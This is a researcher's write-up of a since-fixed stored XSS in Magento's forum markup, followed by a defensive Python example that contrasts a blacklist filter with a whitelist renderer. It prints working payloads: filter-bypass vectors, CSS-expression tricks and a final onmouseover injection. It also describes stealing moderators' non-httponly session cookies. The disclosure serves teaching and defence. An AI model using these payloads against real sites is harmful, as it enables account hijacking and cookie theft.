1. The document describes a stylish cross-site scripting (XSS) vulnerability found in Magento, an e-commerce platform.
2. The author was able to bypass input sanitization from CodeIgniter, an open-source web application framework used by Magento, and execute JavaScript code by abusing Magento's rich text formatting features and allowed HTML tags.
3. By setting JavaScript code as the value of CSS style properties like "width" or using multi-line comments, the author was able to execute the code despite CodeIgniter's input filtering. This allowed executing arbitrary JavaScript on the site.
How to bypass CodeIgniter in a Real World Setting?
by Ashar Javed (https://twitter.com/soaj1664ashar)

Normally I do not write about XSS findings in the form of a write-up (I always prefer to tweet) unless the finding is interesting (e.g., http://www.scribd.com/doc/211362856/Stored-XSS-in-Twitter-Translation), funny (e.g., http://issuu.com/msasharjaved/docs/urlwriteup) or worth sharing (e.g., http://www.scribd.com/doc/210121412/XSS-is-not-going-anywhere). This XSS in Magento is interesting, funny and worth sharing. Further, this XSS is not about alert or money. It is about passion and love. Furthermore, this story shows you how to bypass "CodeIgniter" --- one of the most popular PHP-based web application frameworks --- in a real world setting, or you may call it a real world CTF. Some of my XSS findings are available in the presentation (http://slid.es/msasharjaved/cross-site-scripting-my-love) that I gave at RSA Europe 2013 as a part of the OWASP Seminar. Make sure to press the downward arrow for each XSS example's explanation.

Magento Commerce (https://www.magentocommerce.com) --- an eBay Inc. company --- is one of the leading providers of ecommerce-based solutions. Magento announced a bug bounty program (http://magento.com/security) a few months ago. Magento allows the following set of mark-ups (shown in the figure given below) if you wish to post a question on the forums (http://www.magentocommerce.com/boards/newtopic/), wish to reply to someone's post (http://www.magentocommerce.com/boards/newreply/) or want to send a private message to members of the forums (http://www.magentocommerce.com/boards/member/messages/pm/), and the feature is also available as a part of the forum's signature (https://www.magentocommerce.com/products/customer/account/editsignature/). Magento is also using this mark-up feature on its subdomains like http://enterprise.magento.com/ and http://go.magento.com/. In short, this feature is everywhere on the site. Magento's mark-up or rich text or WYSIWYG feature is pretty restricted and only allows a few harmless tags, i.e., bold, italic, underline, quote, code, mailto and anchor tag.

At the same time, the user can also set "size" and "color" properties of the above mentioned tags, as a part of a style attribute. Now let's describe how these tags work in a normal manner. The following input (the left column of the original table) results in the rendering shown in the right column:

[b][size=4][color=blue]bold[/size][/color][/b]
[i]italic[/i]
[u]underline[/u]
[quote]quote[/quote]
[code]code[/code]
[email=justashar@hotmail.com]reach me[/email]
[url=http://www.bbcnews.com]Top Stories[/url]

I try to break down the above input into parts, e.g., [b][size=4][color=blue]bold[/size][/color][/b] is internally treated as:

<b><span style="font-size:16px;"><span style="color:blue;">bold</span></span></b>

Quick Test
----------

As a part of a quick test, I initially tried the most common XSS vector, i.e.:

"><img src=x onerror=prompt(1);>

and the site converted this attack vector into:

>xonerror=prompt(1);

AND as a part of a second try, I used the following XSS vector (I wanted to see HTML5 because it seemed XSS was not working):

">><marquee><img src=x onerror=confirm(document.cookie)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>alert(document.domain)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-- >"></script><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="http://www.ieee-security.org/images/new-web/Trojan_Horse.jpg"onmouseover=eval(id&#x29;>'"><img src="http://bryanhallsawakening.files.wordpress.com/2013/09/anonymousbigbrotherclone.jpg"/ onmousover=alert(1)><script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

and it was converted into:

>><marquee>x onerror=confirm([removed])<marquee>"><plaintext\><|\><plaintextonmouseover=prompt(1)>">alert(document.domain)@gmail.com<isindex formaction=[removed]alert(/XSS/) type=submit>'-- >">alert(1)"><img id="confirm(1)"alt=""src="http://www.ieee-security.org/images/new-web/Trojan_Horse.jpg"onmouseover=eval(id)>>http://bryanhallsawakening.files.wordpress.com/2013/09/anonymousbigbrotherclone.jpg

In short, the above vector also does not work, but if you noticed the underlined stuff (i.e., [removed]) in the converted vector, it shows that the site is using CodeIgniter, a popular PHP-based web application framework. If you ever wondered how CodeIgniter works for XSS mitigation, I would like to refer you to: https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L128. As part of CodeIgniter's feature, it simply looks for some black-listed words like "document.cookie", "javascript" etc. and then tries to change these words into [removed]; the goal is to mitigate the effect of JavaScript. If you would like to see what I already did with CodeIgniter (bypassed several times), please see: https://github.com/EllisLab/CodeIgniter/issues/2667. Rafay (https://twitter.com/rafaybaloch) and Mathias (https://twitter.com/avlidienbrunn) also participated in this bug report and found bypasses.

The summary so far: the most commonly used XSS attack vector and the vector that I often use do not work ... At this point, I am pretty sure most of the respected bug bounty hunters and f**king automation tools stop and start looking for other low hanging fruits :) This XSS is out of scope for any automation tool out there. But for me it "Sounds Challenging", so

More Testing
------------

Let's try "onmouseover" or "onmousemove" etc. stuff in the allowed mark-ups and see what happens, e.g.:

[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

AND/OR

[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

Both of the above mentioned variations also do not work. Internally the site treats them as: [screenshot] Output looks like: [screenshot]

If you remember, one of the allowed mark-ups is an anchor, i.e., the <a> tag (i.e., [url=http://www.bbcnews.com]Top Stories[/url]). The immediate thought that came to my mind was: I should try XSS via javascript (i.e., javascript:alert(1)) and/or a data URI (i.e., data:text/html;base64,...). Let's input ...

[url=javascript:alert(1)]Top Stories[/url]

AND/OR

[url=data:text/html;base64,...]Top Stories[/url]

The above two forms of injection also do not work, and internally the site treats them as: [screenshot] If you look closely at the above figure, you will see http:// has been prepended before the javascript and data URIs ... which makes them USELESS. At the same time, CodeIgniter again comes into action and converts the word "javascript" into the string "[removed]" in the first variation.

The next thing I tried is:

[url=ja&Tab;vas&Tab;cript:alert&lpar;1&rpar;]Top Stories[/url]

and the sole purpose is to defeat CodeIgniter's black-listed term "javascript" with the help of HTML5 entities. But Magento converts the above injection into (& is converted into its respective entity, i.e., &amp;):

<a href="http://ja&amp;Tab;vas&amp;Tab;cript:alert&amp;lpar;1&amp;rpar;" target="_blank">Top Stories</a>

At this point of time, I am in need of a "cup of tea", so "Tea Time" :-)

As soon as I finished a "cup of tea", an immediate thought came to my mind that I should try XSS via the "style" attribute (that's why Stylish XSS :)). Please keep in mind the above mentioned allowed procedure of setting a "style" on allowed mark-ups: the following input

[b][size=4][color=blue]bold[/size][/color][/b]

is treated internally as:

<b><span style="font-size:16px;"><span style="color:blue;">bold</span></span></b>

It means that if we specify a style, the site dynamically generates a <span> tag along with a "style" attribute and assigns the value of the mentioned size and given color to it. The initial goal I have in mind is to execute JavaScript via CSS expressions, i.e., x:expression(alert(1)) or width:expression(alert(1)). JavaScript execution via CSS expressions (in old IE browsers) has been known since ages and has already been discussed at http://sla.ckers.org/forum/index.php and https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. So as a part of the next step, I tried ...

[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]

which becomes: [screenshot]

Again CodeIgniter comes into action (see figure above) and has removed the black-listed word, i.e., "expression". In order to defeat the black-listed word "expression", a known technique has also been discussed at http://sla.ckers.org/forum/index.php and the technique is: "expre/**/ssion", i.e., the use of a multi-line comment inside the word "expression"; IE7 simply ignores /**/ and JavaScript via the CSS expression gets executed. So let's change the vector to one that uses "expre/**/ssion".

[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]

So it seems that, with the help of /**/, the above injection bypasses CodeIgniter's black-listed word "expression" and it looks like: [screenshot]

BUT still JavaScript does not get executed in IE7 and the reason is the "color" CSS property. In CSS, the standard way to assign a value to a property is:

CSSPropertyName: Value

In the above case (see figure above), the browser considers "width" as a value of the "color" property, which is basically nothing, and "width:expre/**/ssion" never gets executed. The following is the screen-shot of the source code in the IE7 browser: [screenshot]

The problem in hand is HOW TO GET RID OF the "color" property so that I can use "width:expre/**/ssion(alert(1))" (width as the property name and the expression as its value). The site's user-interface only allows the "color" and "size" properties.

One more thing that you may have noticed in the above screen-shot is that alert(1) becomes alert&#40;1&#41;. This shows CodeIgniter again comes into action :) CodeIgniter converts the black-listed keyword "alert(1)", if found in the input, but this time instead of using "[removed]", CodeIgniter only converts ( and ) into their respective decimal encoded forms. I think this is an implementation flaw of CodeIgniter because even if ( and ) are converted into decimal entities, they will still work in a JavaScript context (later you will see a screen-shot) ... OR as an alternate way or proof of concept, you can simply use "confirm" or "prompt" ... In a real life attack scenario, an attacker does not need alert, confirm or prompt ... :-)

At this time, a weird idea came to my mind and the idea is: WHAT WILL HAPPEN IF I USE A "STYLE" TAG, i.e., [style]...[/style] (in the allowed mark-up syntax)? The reason is: the site is allowing the style attribute; maybe it will allow a style tag also, or maybe the developers made a mistake in the implementation and do not differentiate between the style attribute and the style tag :-) So I decided to input the following:

[b][style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and it becomes:

<span class="width:expre/**/ssion(alert(1))">bold</span>

It means that this time, Magento has generated a <span> tag but without a "style" attribute. Instead of dynamically generating the "style" attribute, Magento has created a "class" attribute.

One thing we already know: the "style" attribute is allowed, but previously it worked only with the "size" and "color" properties. As a part of the next step, what will happen if I use the <style> tag (i.e., [style][/style]) along with the "style" attribute? Now our above injection becomes:

[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and the site converts the above injection into:

<span class="style=width:expre/**/ssion(alert(1))">bold</span>

Unfortunately this again does not work because the browser treats style=width:expre/**/ssion(alert(1)) as a value of the "class" attribute. BUT the good thing is that I have now GOT RID OF the "color" property and the only thing left is TO BREAK OUT OF THE ATTRIBUTE CONTEXT, i.e., in this case the "class" attribute. Now we only need DOUBLE QUOTES at first sight ... :-) So the new injection now looks like:

[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and this time, Magento has converted the above injection into:

<span class="" style="width:expre/**/ssion(alert(1))&quot;">bold</span>

Though we have jumped out of the attribute context, we still need the value of the "style" attribute to look like style="width:expre/**/ssion(alert(1))" in order to get JavaScript executed via CSS expressions. If you look closely, the site automatically inserts an ending/closing " (double quote) in order to properly close the attribute value. Finally our injection is:

[b][style="style=width:expre/**/ssion(alert(1)) junktext]bold[/style][/b]

and this time Magento behaves like a good child:

<span class="" style="width:expre/**/ssion(alert(1))" junktext"="">bold</span>

So now all is set for an XSS in IE7 ... But after the XSS, the following questions came to my mind ...

IS IT ENOUGH TO HAVE AN XSS THAT ONLY WORKS IN IE7?
WHO CARES ABOUT AN XSS THAT WILL ONLY WORK IN IE7?
CAN I CONVERT THIS XSS INTO AN XSS THAT WORKS IN MODERN BROWSERS?

Lets Do It
----------

If you remember correctly, as soon as we injected the [style][/style] mark-up, Magento dynamically created a "class" attribute, e.g., [b][style=]bold[/style][/b] has been converted into:

<span class="">bold</span>

It means that now we can try "onmouseover" stuff along with the "style" tag and this should work ... So our FINAL injection, which works in the latest Chrome browser, now looks like:

[b][style="onmouseover="alert(cookie);]bold[/style][/b]

The first " will break out of the attribute context while the second " will hold alert(cookie) in the following manner: "alert(cookie)". The above injection has been converted into ...

<span class="" onmouseover="alert(cookie);">bold</span>

Here is the screen-shot of the code in Chrome: [screenshot]

One thing you may have noticed is that I have used "cookie" instead of "document.cookie". The reason is CodeIgniter, because it removes "document.cookie" if found in the input string ... BUT WHO NEEDS "document.cookie" when one can use "cookie"? On the following URL you will find 20 plus unique ways of accessing a cookie ... http://pastie.org/private/nkryfy49l1oy8hvblh90q If you use "document.cookie", then the injection looks like the following and does not work: [screenshot]

Now it's time to see the XSS in the latest Chrome and another cup of tea ... :-)

Another thing I have noticed is that the "PHPSESSID" cookie is not httponly. It means an attacker can easily steal the session cookie of FORUM MODERATORS or Magento's team members by simply sending a PRIVATE MESSAGE. In order to see who is moderating the forums, on the following URL: http://www.magentocommerce.com/boards/, if you scroll down the page, the page shows a list of active members and the usernames of moderators are highlighted, e.g.:

http://www.magentocommerce.com/boards/member/382896/
http://www.magentocommerce.com/boards/member/163318/
http://www.magentocommerce.com/boards/member/139907/

This type of attack (i.e., stealing session cookies via XSS on forums) has already been used successfully in the case of the Ubuntu Forums (http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/) and the Apple developer forums (http://mytechblog.com/other/apple/apple-developer-website-hacked-what-happened/) ...

This XSS has been fixed and it took Magento three and a half months for the fix. As a part of an exercise you guys may try to break the fix :) Please let me know your feedback on this ... Luckily one can still see this XSS live here (the old post is still there and they forgot to delete it): http://www.magentocommerce.com/boards/viewthread/877566/ Once you open this URL, please "Do not bring your mouse over the word bold" ;-)
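As an added example (not the author's code, nor CodeIgniter's or Magento's), the following Python models the two lessons of this write-up from the defender's side: a remove-the-bad-word filter of the kind described above is defeated by "expre/**/ssion", while a renderer that HTML-escapes the whole input first and only emits "style" values that pass a strict whitelist (a known integer size, a plain colour name or a hex colour) never lets a [style=...] tag, a stray quote or an event handler reach the generated <span>. The bbcode tag set, the size table and the colour rule are assumptions for this example, not Magento's real ones.

```python
import html
import re

# Constructed model of a black-list filter like the one the write-up describes
# (look for bad words, replace them with "[removed]"); NOT CodeIgniter's Security.php.
BLACKLISTED = ("javascript", "expression", "document.cookie")


def blacklist_filter(value):
    for word in BLACKLISTED:
        value = re.sub(re.escape(word), "[removed]", value, flags=re.IGNORECASE)
    return value


# Whitelist renderer for the three tags discussed on the page: [b], [size=N], [color=X].
# The size table and the colour rule are assumptions made for this example.
TAG_RE = re.compile(r"\[(b|size|color)(?:=([^\]]*))?\](.*?)\[/\1\]", re.DOTALL)
SIZE_PX = {"1": 10, "2": 12, "3": 14, "4": 16, "5": 18, "6": 20, "7": 24}
COLOR_RE = re.compile(r"^(?:[a-z]{3,20}|#[0-9a-fA-F]{6})$")


def _render_tag(m):
    tag, value, inner = m.group(1), m.group(2), m.group(3)
    if tag == "b" and value is None:
        return f"<b>{inner}</b>"
    if tag == "size" and value in SIZE_PX:  # only a known integer key gets through
        return f'<span style="font-size:{SIZE_PX[value]}px;">{inner}</span>'
    if tag == "color" and value is not None and COLOR_RE.match(value):
        return f'<span style="color:{value};">{inner}</span>'
    return m.group(0)  # anything else stays as the (already escaped) literal text


def render_bbcode(text):
    # Escape first: every <, >, ", ' and & from the user is neutralised before any
    # tag is turned into HTML, so an unknown [style=...] can never become markup
    # and a quote can never close the generated attribute early.
    out = html.escape(text, quote=True)
    while True:
        new = TAG_RE.sub(_render_tag, out)  # outermost tags per pass; repeat for nesting
        if new == out:
            return out
        out = new
```

The filter leaves "width:expre/**/ssion(alert(1))" untouched, exactly as the page observes, whereas the renderer rejects it as a colour value and shows it as inert text.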